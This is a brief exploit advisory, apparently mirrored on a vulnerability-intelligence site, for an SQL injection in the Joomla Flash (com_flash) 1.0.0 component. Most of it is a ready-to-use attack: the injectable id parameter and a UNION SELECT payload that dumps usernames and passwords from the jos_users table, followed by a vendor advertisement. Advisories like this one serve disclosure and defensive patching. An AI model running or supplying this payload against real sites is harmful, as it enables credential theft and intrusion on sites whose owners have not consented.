Joomla Flash 1.0.0 SQL Injection vulnerability by com_flash componen
`#############################################################################
# #
# Joomla Component com_flash SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Flash (com_flash)"
[~] Version: "1.0.0"
[~] Author: "Newgekko "
[~] Author E-mail: "[email protected]"
[~] Author URL: "www.newgekko.com"
########################################
[~] Exploit: /index.php?option=com_flash&act=view&Itemid=37&id=[SQL]
[~] Example: /index.php?option=com_flash&act=view&Itemid=37&id=-1337+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
########################################
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo